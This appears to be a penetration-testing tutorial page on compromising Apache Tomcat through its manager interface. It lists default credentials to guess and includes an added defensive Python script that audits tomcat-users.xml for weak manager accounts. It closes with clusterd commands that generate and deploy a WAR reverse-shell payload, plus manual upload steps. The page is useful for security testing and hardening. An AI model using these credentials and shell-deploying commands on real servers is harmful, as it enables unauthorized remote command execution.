Tomcat
The Tomcat application server can be attacked through the management interface. This is usually found at the URL /manager/ or /manager/html on port 8080. We attack Tomcat through known or easily guessable credentials on the management interface. Various levels of insecure defaults can be found in different versions of Tomcat, with a trend toward becoming more secure in later versions.
Some credentials to try on the Tomcat manager interface include the following:
tomcat/s3cret
tomcat/tomcat
admin/admin
tomcat/admin
admin/tomcat
admin/password
tomcat/password
admin/
tomcat/
Note that the username does not HAVE to be "admin" or "tomcat", but it usually is, because this is what most configuration guides use.
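From the defensive side, the same credential list is a useful audit input: any account in tomcat-users.xml that holds a manager role and uses one of these passwords (or no password at all) is exactly what the guessing described above finds. The following script is an added example, not part of this page or of clusterd; the tomcat-users.xml content embedded in it is constructed for illustration, and the role names it treats as manager-capable are Tomcat's documented manager-gui, manager-script, manager-jmx and manager-status roles.

```python
import xml.etree.ElementTree as ET

# Passwords from the credential list above; "" covers the "admin/" and
# "tomcat/" entries, i.e. an account with an empty password.
WEAK_PASSWORDS = {"s3cret", "tomcat", "admin", "password", ""}

# Roles that grant access to the Tomcat manager application.
MANAGER_ROLES = {"manager-gui", "manager-script", "manager-jmx", "manager-status"}

# Constructed sample tomcat-users.xml (not from a real deployment).
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <role rolename="admin-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,manager-script"/>
  <user username="admin" password="" roles="manager-gui"/>
  <user username="deploy" password="Xq7!mP2#vL9z" roles="manager-script"/>
  <user username="svc" password="tomcat" roles="admin-gui"/>
</tomcat-users>
"""


def audit_tomcat_users(xml_text):
    """Return a list of (username, reason) for accounts that can reach the
    manager application and use a password from WEAK_PASSWORDS.

    Accounts without a manager role are skipped: the check is scoped to the
    exposure this page describes, not to password quality in general.
    """
    root = ET.fromstring(xml_text)
    findings = []
    for elem in root.iter():
        # Drop the XML namespace so the tag compares as a plain "user".
        if elem.tag.rsplit("}", 1)[-1] != "user":
            continue
        user = elem.get("username", "")
        pwd = elem.get("password", "")
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        if not roles & MANAGER_ROLES:
            continue
        if pwd in WEAK_PASSWORDS:
            reason = "empty password" if pwd == "" else "well-known default password"
            findings.append((user, reason))
    return findings


if __name__ == "__main__":
    for user, reason in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(f"manager-capable account '{user}': {reason}")
```

Run against a real file with `audit_tomcat_users(open("/path/to/conf/tomcat-users.xml").read())`. The "svc" account uses a listed password but holds only admin-gui, so it is not reported; the "deploy" account holds a manager role but a non-default password, so it is not reported either.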
If access can be gained to the Tomcat administrative interface, it is trivial to achieve remote command execution (assuming your account has the correct permissions). Again, clusterd can automate this process:
sudo python clusterd.py -o linux -i localhost -p 8080 -a tomcat --usr-auth tomcat:s3cret --deploy shell3.war --deployer manage_deploy --invoke
Note that in the above, shell3.war was generated using the clusterd command:
sudo python clusterd.py -o windows -a tomcat --gen-payload 127.0.0.1:4444
To perform this same attack manually is trivial. Simply access the manager interface at http://<host>:8080/manager/html. Scroll down to the "Deploy" section. It offers a function that allows for upload of a WAR file. Once uploaded, simply start the new service, and your reverse shell will be obtained.